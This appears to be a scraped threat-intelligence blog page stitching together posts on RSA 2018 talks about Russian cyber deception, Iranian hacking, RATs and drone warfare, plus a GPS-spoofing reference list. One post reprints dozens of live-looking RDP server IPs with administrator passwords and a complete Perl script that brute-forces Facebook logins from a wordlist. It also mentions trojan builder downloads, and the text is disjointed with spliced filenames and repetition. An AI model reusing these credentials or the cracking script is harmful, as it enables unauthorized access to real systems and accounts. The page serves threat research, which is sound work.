Deception, Distortion, Dishonesty: The Real Story Behind the Hype – RSA Conference 2018 – San Francisco

Dr. Khatuna Mshvidobadze

In the summer of 2008, Russia attacked Georgia in the first-ever combined kinetic and cyberwar. Sure, the 1990-1991 Gulf War was dubbed the first information war—the use 226571794ecbc84a4232f3e9a42a7041-480x270of information in war is not new. What was new in 2008 was that Russia employed its cyber arm as an independent operational capability alongside its land, sea and air forces. The targets were critical infrastructure. The strategic objectives were to sap Georgia’s will to resist and to provide cover for Russia’s information campaign to deceive the west into believing that somehow little Georgia was the aggressor.

Operational security was paramount—Moscow had to keep everyone confounded about who was behind the cyber attacks. Just like the kinetic invasion, the cyber attacks were long and well-planned, but Russia did a great job covering its tracks. When the shooting stopped, well-meaning researchers investigated what had happened. However, coming from a profession that focuses on computer screens and a culture unaccustomed to the 2018-04-11_9-18-09kind of deception that is part of everyday Russian life, they foundered.

The attacks led us to Russia. We noted uncanny timing. Western experts were indeed confounded when the trail led to kids and criminals. I have been following that trail ever since. Insight into Russia, all-source intelligence and a keen understanding of denial and deception were needed.

Today, saying that the Russian state employs a network of cybercriminals to do its online dirty work is commonplace. One might just as well pretend not to know the identity of those little green men who seized Crimea. But when I started saying it in 2010, you would not believe the resistance I encountered.

Soon after, I met Jeff Bardin, my professor at Utica College, who became mentor and friend. Jeff brings an extraordinary expertise in all-source intelligence and the ways of denial and deception. At this year’s RSA Conference, it is my privilege to combine with him in a talk entitled Deception, Distortion, Dishonesty: The Real Story Behind the Hype.

Jeff will lead off, analyzing the types of D&D, its various dimensions and some tactics that can be employed online and offline. The planners, he will say, must have clear reasons for utilizing D&D based on their goals. They must define the strategic, operational and tactical goals of deception and the criteria for success.

I will point out that Russians do not see cyber warfare as distinct but regard it as just one tool of information war. Look at 2008. The cyber attacks aimed at hampering the Georgian government’s ability to communicate while Moscow’s propaganda machine painted Russia as the aggrieved party. “Information space opens wide asymmetrical possibilities for reducing the fighting potential of an enemy,” writes Valery Vasilyevich Gerasimov, Chief of the Russian General Staff. It’s a remarkable statement, but nothing new—Russian thinking on information warfare has been consistent since the 1980s.

Now, the Kremlin commands a vast network of online intelligence agencies, scientific organizations, academic institutions, criminals, and trolls. We’ll discuss how Russia deals with enemies, foreign and domestic, cyber players and organization, the growing role of the military, tactics, techniques, procedures and tools, vectors, false flags, troll factories and more. Come join us on Wednesday at the RSA Conference.

KM

Coincidences Take A Lot of Planning – RSA Conference 2018 – San Francisco

The RSA Conference is soon upon us! The expectation to see old friends and make new rsa1800008-buckle-up_augacquaintances. The show will once again be great with new technologies displayed, new ideas bantered about, and phrases around AI used inappropriately and about 5-10 years too soon. The parties will crank at night and many will suffer the cocktail flu come the next morning. 40,000 strong is the estimated number for this event! Huge!

کنفرانس RSA 2018  rsa-конференция 2018  2018 RSA 회의  rsa 2018年会议  مؤتمر rsa 2018

But what of the undercurrent that occurs unmentioned every year? Just beneath the surface are a series of activities generated by scores of foreign agents looking to steal information, intellectual property, or gain an upper hand over someone of importance being caught doing illicit things. How many spies will blanket the city and the shop floor armed with various technologies used to extract information? Cyber and physical espionage activities run amuck at such events. This is common and expected. How will you know when your data is being pilfered? Will your hotel room be secure? Are your 2018-04-05_14-43-31mobile devices secure? What data have you given up already? Flight plans, hotel information, email addresses, phone numbers, social media data, car rental information, events you will attend, arrival and departure times, restaurant reservations, meeting information… Do you think your data is not in the wind already? Will a chance encounter lead to unexpected information sharing? Is the person next to you at the bar there just by coincidence?

All questions you should consider. All questions that are usually forgotten or ignored.

BEHIND ALL COINCIDENCES THERE IS A PLAN, AND BEHIND ALL PLANS THERE IS A COINCIDENCE – Malnar

I12149464887

Confuser and Oilrig – Iranian Hacks

This is a bit disjointed at this time and is raw data. This is not intelligence, has not been analyzed but does tie directly to Oilrig.

A powerful program to pack your apps. With this program, you can pack programs in C # and VB.Net

Confuser – Confuser program zipped. For download and analysis

a1ir3z4-HK Frequently found on anonysec.org, c-cracking.org, formerly of the Kalli Hack Team (kallihack), http://haraji.8tag.ir

Others in the mix: XVII_Hacker, #XVII_Roman & #BlackErroR1 & #sorblack

BTC BRUTER v.3.0 By UNKNOWN-KILLER

Bitcoin Cracker Performance Test via Telegram: @ a1ir3z4HK @ a1ir3z4_HK_bot
Using temp emails here: http://www.emeil.ir/
Sprinkle the effort with a bit of Russian for flavoring

Cʏʙᴇʀ Cʀᴀᴄᴋɪɴɢ | سایبر کرکینگ

61.155.153.21:3389@SZCN2003X-5984\administrator;1qaz@WSX3edc
123.206.72.128:3389@10_221_112_104\administrator;1qaz@WSX3edc
123.207.139.51:3389@10_10_123_100\administrator;1qaz@WSX3edc
113.108.144.211:3389@ZK\administrator;1qaz@WSX
218.13.56.118:3389@HEGII\administrator;1qaz@WSX
218.17.182.99:3389@DTC-S01\administrator;1qaz@WSX
58.213.155.42:3389@SQL\administrator;1qaz@WSX
218.90.154.154:3389@DHT1FDC2\administrator;1qaz@WSX
218.94.38.222:3389@WIN-3EGCECLJQ5J\administrator;1qaz@WSX
180.107.198.6:3389@HAMBER\administrator;1qaz@WSX
117.89.141.232:3389@DELL-R710\administrator;1qaz@WSX
58.221.10.142:3389@WIN-QUO7ORFGR99\administrator;123qwe!@#
180.112.122.235:3389@HP-SERVER\administrator;123qwe!@#
219.136.229.194:3389@BMYWEB\administrator;1234qwer!@#$
121.9.14.146:3389@WIN-90NIL448CQ4\administrator;1qaz!QAZ
119.145.72.210:3389@WINDOWS-M89UCHU\administrator;1qaz!QAZ
218.93.123.171:3389@USER-A4G6BL8T0O\administrator;1qaz!QAZ
61.160.112.76:3389@NWERPDB\administrator;1qazXSW@
117.80.229.78:3389@KSBOMAN\administrator;1qazXSW@
119.29.157.222:3389@10_135_48_44\administrator;1qazXSW@
61.145.180.174:3389@TEDU-LH\administrator;!QAZ2wsx
113.108.146.83:3389@WIN-QIO2J4TRCMJ\administrator;!QAZ2wsxЧитать полностью…

61.155.153.21:3389@SZCN2003X-5984\administrator;1qaz@WSX3edc
123.206.72.128:3389@10_221_112_104\administrator;1qaz@WSX3edc
123.207.139.51:3389@10_10_123_100\administrator;1qaz@WSX3edc
113.108.144.211:3389@ZK\administrator;1qaz@WSX
218.13.56.118:3389@HEGII\administrator;1qaz@WSX
218.17.182.99:3389@DTC-S01\administrator;1qaz@WSX
58.213.155.42:3389@SQL\administrator;1qaz@WSX
218.90.154.154:3389@DHT1FDC2\administrator;1qaz@WSX
218.94.38.222:3389@WIN-3EGCECLJQ5J\administrator;1qaz@WSX
180.107.198.6:3389@HAMBER\administrator;1qaz@WSX
117.89.141.232:3389@DELL-R710\administrator;1qaz@WSX
58.221.10.142:3389@WIN-QUO7ORFGR99\administrator;123qwe!@#
180.112.122.235:3389@HP-SERVER\administrator;123qwe!@#
219.136.229.194:3389@BMYWEB\administrator;1234qwer!@#$
121.9.14.146:3389@WIN-90NIL448CQ4\administrator;1qaz!QAZ
119.145.72.210:3389@WINDOWS-M89UCHU\administrator;1qaz!QAZ
218.93.123.171:3389@USER-A4G6BL8T0O\administrator;1qaz!QAZ
61.160.112.76:3389@NWERPDB\administrator;1qazXSW@
117.80.229.78:3389@KSBOMAN\administrator;1qazXSW@
119.29.157.222:3389@10_135_48_44\administrator;1qazXSW@
61.145.180.174:3389@TEDU-LH\administrator;!QAZ2wsx
113.108.146.83:3389@WIN-QIO2J4TRCMJ\administrator;!QAZ2wsxЧитать полностью…

182.71.201.2:3389@TECHNOPAK\administrator;p@ssw0rd
150.242.254.98:3389@WINWORLD\administrator;Pass@word1
115.112.155.95:3389@APOLLOHOSPITALS\administrator;P@ssw0rd
221.135.143.132:3389@DMSSERVER\administrator;P@ssw0rd
220.225.210.91:3389@CTL\administrator;P@ssw0rd
45.64.195.147:3389@UNISRV\administrator;P@ssw0rd
125.22.73.198:3389@NAVGGL\administrator;P@ssw0rd
125.22.73.196:3389@NAVGGL\administrator;P@ssw0rd
59.144.162.8:3389@DELLSERVER\administrator;Admin@123
27.54.170.204:3389@DCPLHO\administrator;Admin@123
180.151.71.42:3389@FOURDTECH\administrator;Admin@123
202.47.116.201:3389@JAYAIR\administrator;Admin@123
118.185.53.18:3389@JBBROTHERS\administrator;Admin@123
27.251.117.6:3389@WIN-6T4QFMCPVE8\administrator;Admin123
103.230.152.172:3389@WIN-PMCSC1KVLPH\administrator;admin@123
219.65.58.58:3389@BIOTECH\administrator;admin@123
124.123.99.31:3389@WIN-RJTS2DUSFC1\administrator;admin@123
122.15.47.237:3389@ADMINISTRATOR\administrator;admin@123
125.63.94.107:3389@LAT039010002\administrator;admin@123
103.50.152.53:3389@BIOTECH\administrator;admin@123
117.252.2.69:3389@ADMINISTRATOR\administrator;admin@123
119.226.187.124:3389@WINDOWS-LJLRPML\administrator;admin@123
125.21.48.42:3389@WINDOWS-LJLRPML\administrator;admin@123
223.30.104.27:3389@WIN-ANRHQC2VF3Q\administrator;admin@123
125.20.83.199:3389@DSKE-1\administrator;admin@123
223.30.126.218:3389@CKHO\administrator;admin@123
59.90.244.200:3389@TEEPARAM-SERVER\administrator;Passw0rd1
14.102.15.38:3389@LAB01\administrator;password@123
124.124.70.194:3389@BRIGADEGROUP\administrator;password@123
220.227.9.77:3389@SCINDIASCHOOL\administrator;password@123
122.200.19.58:3389@ASHTE-RFID\administrator;P@ssw0rd@123
61.12.1.3:3389@WINDOWS-CYMSTZH\administrator;password@1234
182.74.185.140:3389@BIBAAPPARELS\administrator;abc@123
180.211.99.2:3389@GCPL\administrator;
112.196.8.202:3389@LIBRARYSERVER\administrator;
118.185.4.242:3389@SRI01\administrator;
Capture
Beast Trojan Builder – (change to .rar to unzip) Use at own risk.
57c4d9a0-63da-46d3-9e16-b720d27b0f6a

Iranian Hacking – Saudi Sites – Bruteforcing facebook zhacker

Music is horrendous – be warned

 

 

and the script:

#!/usr/bin/perl
#

use strict;
use Net::SSLeay::Handle;

if(!defined($ARGV[0] && $ARGV[1])) {

system(‘clear’);
print ” Version 2.32 \n”;
print “\033[1;32md88888b .d8b. .o88b. d88888b d8888b. .d88b. db dD d88888b d8888b. \n”;
print “88′ d8′ `8b d8P Y8 88′ 88 `8D .8P Y8. 88 ,8P’ 88′ 88 `8D \n”;
print “88ooo 88ooo88 8P 88ooooo 88oooY’ 88 88 88,8P 88ooooo 88oobY’ \n”;
print “88~~~ 88~~~88 8b 88~~~~~ 88~~~b. 88 88 88`8b 88~~~~~ 88`8b \n”;
print “88 88 88 Y8b d8 88. 88 8D `8b d8′ 88 `88. 88. 88 `88. \n”;
print “YP YP YP `Y88P’ Y88888P Y8888P’ `Y88P’ YP YD Y88888P 88 YD \n”;

print “\033[1;31m ======================================================\n”;
print “\033[1;37m Usage: perl $0 Email wordlist.txt\n\n\n\n\n\n\n\n\n”;
print “\033[1;31m ======================================================\n”;
print “\n”;
print “\n”;
print “\n”;
print “\n”;
print “\n”;
print “\n”;
exit; }

my $user = $ARGV[0];
my $wordlist = $ARGV[1];

open (LIST, $wordlist) || die “\n[-] Can’t find/open $wordlist\n”;

 

print ” Version 2.32 \n”;
print “\033[1;32md88888b .d8b. .o88b. d88888b d8888b. .d88b. db dD d88888b d8888b. \n”;
print “88′ d8′ `8b d8P Y8 88′ 88 `8D .8P Y8. 88 ,8P’ 88′ 88 `8D \n”;
print “88ooo 88ooo88 8P 88ooooo 88oooY’ 88 88 88,8P 88ooooo 88oobY’ \n”;
print “88~~~ 88~~~88 8b 88~~~~~ 88~~~b. 88 88 88`8b 88~~~~~ 88`8b \n”;
print “88 88 88 Y8b d8 88. 88 8D `8b d8′ 88 `88. 88. 88 `88. \n”;
print “YP YP YP `Y88P’ Y88888P Y8888P’ `Y88P’ YP YD Y88888P 88 YD \n”;

print “\033[1;31m ======================================================\n”;
print “\033[1;33m made by [[Z hacker]] \n”;
print “\033[1;31m ========================================================\n”;

print “\033[1;39m\n [+] Cracking Started on: $user …\n\n”;
print “=======================================\n”;

while (my $password = <LIST>) {
chomp ($password);
$password =~ s/([^^A-Za-z0-9\-_.!~*'()])/ sprintf “%%%0x”, ord $1 /eg;

my $a = “POST /login.php HTTP/1.1”;
my $b = “Host: http://www.facebook.com”;
my $c = “Connection: close”;
my $e = “Cache-Control: max-age=0”;
my $f = “Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8”;
my $g = “Origin: https://www.facebook.com&#8221;;
my $h = “User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31”;
my $i = “Content-Type: application/x-www-form-urlencoded”;
my $j = “Accept-Encoding: gzip,deflate,sdch”;
my $k = “Accept-Language: en-US,en;q=0.8”;
my $l = “Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3”;

my $cookie = “cookie: datr=80ZzUfKqDOjwL8pauwqMjHTa”;
my $post = “lsd=AVpD2t1f&display=&enable_profile_selector=&legacy_return=1&next=&profile_selector_ids=&trynum=1&timezone=300&lgnrnd=031110_Euoh&lgnjs=1366193470&email=$user&pass=$password&default_persistent=0&login=Log+In”;
my $cl = length($post);
my $d = “Content-Length: $cl”;

 

my ($host, $port) = (“www.facebook.com”, 443);

tie(*SSL, “Net::SSLeay::Handle”, $host, $port);

print SSL “$a\n”;
print SSL “$b\n”;
print SSL “$c\n”;
print SSL “$d\n”;
print SSL “$e\n”;
print SSL “$f\n”;
print SSL “$g\n”;
print SSL “$h\n”;
print SSL “$i\n”;
print SSL “$j\n”;
print SSL “$k\n”;
print SSL “$l\n”;
print SSL “$cookie\n\n”;

print SSL “$post\n”;

my $success;
while(my $result = <SSL>){
if($result =~ /Location(.*?)/){
$success = $1;
}
}
if (!defined $success)
{
print “\033[1;31m[-] $password -> Failed \n”;
close SSL;
}
else
{
print “\033[1;32m\n########################################################\n”;
print “[+] \033[1;32mPassword Cracked: $password\n”;
print “\033[1;32m########################################################\n\n”;
close SSL;
exit;
}
}

Rinlogger Teaching

 

Treadstone 71 Selected to Deliver at the RSA Conference 2018 San Francisco

Foundations for a Strong Intelligence Program
April 18, 9AM-11AM RSA Conference
This Lab will explore key aspects of building a strong and long-lasting cyberthreat intelligence program. We’ll review methods of threat intelligence platform selection and bake-off techniques as well as cover stakeholder analysis and priority intelligence requirements. Additionally, we’ll practice collection planning and mission management as well as how to establish effective reporting and dissemination capabilities.

rsa2018
Cyber CounterIntelligence – Deception, Distortion, Dishonesty
April 18, 1:45PM-2:30PM RSA Conference
Deception, distortion, dishonesty are core to social media postings. Our adversaries use these methods concocting stories that create illusions that are meant to leave us divided. The talk will cover methods of countering their messaging while applying these tactics to protect your own organization and brand. Moving from intelligence to counterintelligence is the natural next step in our evolution.

Plague of the Cyber RATS

How a toxic computer code delivered by ‘Remote Access Trojans’ is an invisible army able to take over a petrochemical plant and blow it to pieces

Ironically, said Bardin, it was Stuxnet that led Iran to enhance its offensive capability: ‘If Stuxnet had happened to the US or UK, it would have been seen as an act of war. In Iran, it made them invest heavily in offensive cyber operations.’

He revealed that 18 per cent of Iranian university students are studying computer science – a cyber warfare talent pool.

http://www.dailymail.co.uk/news/article-5404055/How-hackers-using-RAT-malware-seized-petrochemical-site.html

No guns. No bombs. No conventional weapons of any kind. An invisible army able take over a petrochemical plant like this and blow it to pieces. That’s the power of a toxic computer code delivered by RATs – ‘Remote Access Trojans’ – that’s making UK security experts VERY nervous indeed

‘Fixing this takes political will, and business is always pushing back, because good cyber security adds costs,’ said Bardin. ‘Ultimately, something is going to blow up.’

Drone Wars! Threats, Vulnerabilities and Hostile Use

Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_01Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_02Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_03Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_04Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_05Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_06Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_07Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_08Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_09Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_10Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_11Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_12Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_13Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_14Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_15Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_16Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_17Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_18Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_19Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_20Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_21Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_22Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_23Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_24Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_25Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_26Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_27Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_28Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_29Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_30Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_31Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_32Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_33Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_34Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_35Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_36Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_37Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_38Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_39Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_40Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_41Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_42Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_43Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_44Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_45Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_46Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_47Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_48Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_49Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_50Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_51Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_52Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_53Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_54Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_55

References

Adamy, D. (2001) EW 101 A First Course in Electronic Warfare, Boston: Artech House.

Adamy, D. (2004) EW 102 A Second Course in Electronic Warfare, Boston: Artech House.

Adamy, D. (2009) EW 103 Tactical Battlefield Communications Electronic Warfare, Boston: Artech House.

Adamy, D. (2015) EW 104 EW against a New Generation of Threats, Boston: Artech House.

Anonymous, (2017) GPS/SBAS Signal Generator, GSS4100, Spirent Communications Data Sheet. Satellite AIS, Exact Earth, Ltd.

Anonymous, (9/8/2017) Innovation: Simulating GPS Signals, GPS World, http://gpsworld.com/simulating-gps-signals/

Anonymous, (8/22/2017) Nationwide Automatic Identification System, www.navgen.uscg.gov

Anonymous, (8/22/2017) Long Range Identification and Tracking (LRIT) Overview, www.navgen.uscg.gov

Anonymous, (8/22/2017) How AIS Works, www.navgen.uscg.gov

Anonymous, (2015) Satellite AIS, Exact Earth, Ltd.

Anonymous, (6/21/2015) Cyber Threats against the Aviation Industry, in SCADA on April8, 2014, INFOSEC Institute.

Anonymous, (2012) A Guide for Testers of GPS Devices and Systems, spectracom, Test & Measurement technical Note, TN15-101A – What You Want to know about GPS.

Anonymous, (5/14/2012) what is a GPS Simulator? Spectracom, Test & Measurement White Paper, WP08-101A.

Anonymous, (1/10/2014) GPS Signal Plan, Navipedia, http://www.navipedia.net/index.php/GPS_Signal_Plan

Anonymous, (4/2017) Counter-Unmanned Aircraft System Techniques, HQ, Department of the Army, ATP-3-01.81, https://fas.org/irp/doddir/army/atp3-01-81.pdf

Atayero, A.A, Luka, .K. & Alatishe, A.A (8/2011) Satellite Link Design: A Tutorial, International Journal of Electrical & Computer Sciences, IJECS-IJEND Vol: 11 No: 04.

Balduzzi, M., Wilhoit, K., & Pasta, A. (2014) A Security Evaluation of AIS, Trend Micro Forward-Looking Threat Research

Barker, B.C Capt., et.al. (2006) Overview of the GPS M-Code Signal, MITRE Report.

Bay-Yen, J. (2000) Chapter 5: GPS C/A Code Signal Structure, Fundamentals of Global Positioning System Receivers: A Software Approach, New York: John Wiley, http://read.pudn.com/downloads85/ebook/326017/Fundamentals%20of%20Global%20Positioning%20System%20Receivers/booktext05.pdf

Bhatti, J. & Humphreys, T. E. (2016) Hostile Control of Ships via False GPS Signals Demonstration and Detection, Navigation: Journal of the Institute of Navigation, Vol. 64, No.1, Spring 2017.

Buesne, G & DeSanto, D. (2017) GNSS Receivers and the Cyber-Threat: Lessons from the Information Security Community, Spirent Communications, Baltimore, MD

Buesne, G & Holbrow, M. (6/29/2017) GNSS Threats, Attacks and Simulations, Spirent: PNT Advisory Board, Baltimore, MD

Bussert, J.C. (10/2013) China Expands Influence through Electronics, Signal Magazine, https://www.afcea.org/content/china-expands-influence-through-electronics

Chachak, E. (retrieved 9/1/2017) U.S. Naval Mishaps – Human Error or Cyber Malfeasance? CyberDB.https://www.cyberdb.co/u-s-naval-mishaps-human-error-or-cyber-malfeasance/

Crosby, J. (12/16/2017) here’s What USNS Bowditch Does, Inverse Innovation, https://www.inverse.com/article/25346-usns-bowditch-underwater-drone-stolen-china

Demchak, C., Patton, K, T. & Tangredi, S.J. (8/25/2017) why are our Ships Crashing? Competence, Overload, and Cyber Considerations, Center for International Maritime Security. https://www.realcleardefense.com/articles/2017/08/25/why_are_our_ships_crashing_competence_overload_and_cyber_considerations_112152.html

Dupont, G. (2017) SIEM Fundamentals for your Threat Intelligence Program, Recorded Future, https://www.recordedfuture.com/security-operations-center-fundamentals/

Easton, R.D. & Frazier, E.F. (2013) GPS Declassified: From Smart Bombs to Smartphones, University of Nebraska Press.

FCC Wireless Telecommunications Bureau, Marine VHF Radio Channels, per 47 CFR 80.371© and 80.373(f)

Fessenden, F. & Watkins, D. (6/18/2017) the Path of the Container Ship that Struck a U.S. Destroyer, NYT. https://www.nytimes.com/interactive/2017/06/18/world/asia/path-ship-hit-uss-fitzgerald.html?mcubz=3

Gaertner, U (2013) UAV Swarm Tactics: An Agent-Based Simulation and Markov Process Analysis, Naval Postgraduate School Thesis.

Haider, Z. & Khalid, S. (8/2016) Survey on Effective GPS Spoofing Countermeasures, 6th International Conference on Innovative Computing Technology (INTECH 2016), https://www.researchgate.net/publication/313543601_Survey_on_effective_GPS_spoofing_countermeasures

Heath, T. (5/7/2015) How to Hack a Military Drone Parts I & II, Technology-Hackers, www.cybersecurityintelligence.com/blog/

Hodge, H. (8/23/2017) why are Navy Ships colliding in the Pacific? Experts Weigh In, Military.com

Homeland Security (2017) Improving the Operation and Development of Global Positioning System (GPS) Equipment Used by Critical Infrastructure, NCIC/NCC Unclassified report.

Hurley, M. (9/2017) Beyond the Iron Triad: The Future of Airborne C2ISR, Arlington, VA: Mitchell Institute for Aerospace Studies.

Humphreys, T.E, e. al. (1/1/2009) assessing the Spoofing Threat: Development of a Portable Civilian GPS Spoofer, https://gps.mae.cornell.edu/humphreys_etal_iongnss2008.pdf, Cornell University

Humphreys, T.E, (7/18/2012) Statement on the Vulnerability of Civil Unmanned Aerial Vehicles and Other Systems to Civil GPS Spoofing, Submitted to the Subcommittee on Oversight., Investigations, and Management of the House Committee on Homeland Security.

Kao, Lee, Chang, and Ko. (2007) A Fuzzy Logic Method for Collision Avoidance in Vessel Traffic Service, Journal of Navigation, 60, 17-31.

John, E.N & Schrage, D.P (2017) System Integration and Operation of a Research Unmanned Aerial Vehicle, Atlanta GA: School of Aerospace Engineering, Georgia Institute of Technology.

LaGrone, S. (8/21/2017) Chain of Events Involving U.S Navy Warships in the Western Pacific Raise Readiness, Training Questions, USNI News

LaGrone, S. (1/31/2017) Cruiser USS Antietam Runs Aground in Tokyo Bay, Spills Oil, USNI News.

Mccaslin, I.B. (2017) Red Drones Over Disputed Seas: A Field Guide to Chinese UAVs/UCAVs Operating in the disputed East and South China Seas. Project 2049 Institute.  http://project2049.net/documents/Red%20Drones%20Over%20Disputed%20Seas_PLA_Project2049.pdf

News Correspondent, (8/22/2017) USS McCain crash is 4th Navy Accident in Pacific this Year, The Washington Post, AP.

News Correspondent, (8/31/2017) DDG 51 Arleigh Burke Class Destroyer, Military.com

News Correspondent, (8/21/2017) CNO Orders Operational Pause, Review After Latest Ship Collision, Military.com

News Correspondent, (8/21/2017) 10 Sailors Missing, 5 injured after Destroyer Collides with Tanker, Military.com

News Correspondent, (8/22/2017) Remains of Navy Sailors found on USS John S McCain, Military.com

News Correspondent, (8/17/2017) Navy Fires Commander, XO from USS Fitzgerald for Fatal Collision, Military.com

News Correspondent, (7/21/2017) Investigation Faults Navy in Fitzgerald Collision Report, Military.com

News Correspondent, (6/20/2017) Stories of Fitzgerald Sailors Killed in Destroyer – Container Ship Crash, Military.com

News Correspondent, (6/16/2017) US Navy Destroyer Collides with Japanese Merchant Ship, Military.com

News Correspondent, (5/09/2017) US Navy Ship Collides with South Korean Fishing Boat, Military.com

News Correspondent, (1/31/2017) Oil Spill in Tokyo Bay After Navy Cruiser Runs Aground, Military.com

Nichols, R.K (8/31/2017) Stand By for a whole slew of military short articles on the Navy Collisions (my students only), Private memo to COT799 & CMST 455.

Nichols, R.K. & Lekkas, P.L. (2002) Wireless Security: Threats, Models, Solutions, New York, McGraw Hill.

O’Donnell, W. (2017) Interview with Navy Captain. http://inmilitary.com/real-reason-us-navy-keeps-hitting-merchant-vessels/

Ranganathan, A, et.al, SPREE A Spoofing Resistant GPS Receiver, Department of Computer Science, ETH Zurich, Switzerland, Zurich Information Security and Privacy Center.

Richardson, J. Adm., (8/31/2017) No Evidence of Hacking in McCain and Fitzgerald Collisions, Military.com

Rudow, l. (2014) Where to Mount a Radome for best Performance, Boat US, http://www.boatus.com/magazine/2014/june/mounting-a-radome.asp

Schallhorn, K., (9/1/2017) US Military crashes, collisions in the Pacific, FoxNews. http://www.foxnews.com/us/2017/08/28/us-military-crashes-collisions-in-pacific.html

Schmidt, D.et.al., (5/2016) A Survey and Analysis of the GNSS Spoofing Threat and Countermeasures, ACM Computing Surveys, Vol 48, No 4, Article 64

Sickle, J.V. (8/25/2017) GEOG 862 GPS and GNSS for Geospatial Professionals, Lessons 1-10 complete, Penn State University, College of Earth and Mineral Sciences  https://www.e-education.psu.edu/geog862/node/1407 [ Superb Course on the subject]

Sterling, J. 8/21/2017) A Spate of US Navy warship accidents in Asia since January, CNNNEWS. http://www.cnn.com/2017/08/21/politics/navy-ships-accidents/index.html

Tucker, P., e. al. (9/2017) Beyond GPS: Upgrading the Military’s Navigation-and-timing Backbone, Defense One, e-Book.

Volpe, J.A, (8/29/2001) Vulnerability Assessment of the Transportation Infrastructure Relying on the Global Positioning System, Final Report, Office of Assistant Secretary for Transportation Policy, U.S. Department of Transportation, John A Volpe Transportation Systems Center.

Warner, J.S. % Johnson, R.G. (2013) A Simple Demonstration That the Global Positioning System (GPS) is Vulnerable to Spoofing, Journal of Security Administration, https://pdfs.semanticscholar.org/8ddb/89f56dd3e2ae265047822bc47cfb06815d9a.pdf, LAUR-03-6163.

Warner, J.S. % Johnson, R.G. (2003) GPS Spoofing Countermeasures, Journal of Security Administration, LAUR-03-2384, Los Alamos, NM:  Los Alamos National Laboratory

Weise, E. (8/23/2017) Could Hackers Be Behind The U.S. Navy Collisions? USATODAY.

Patents

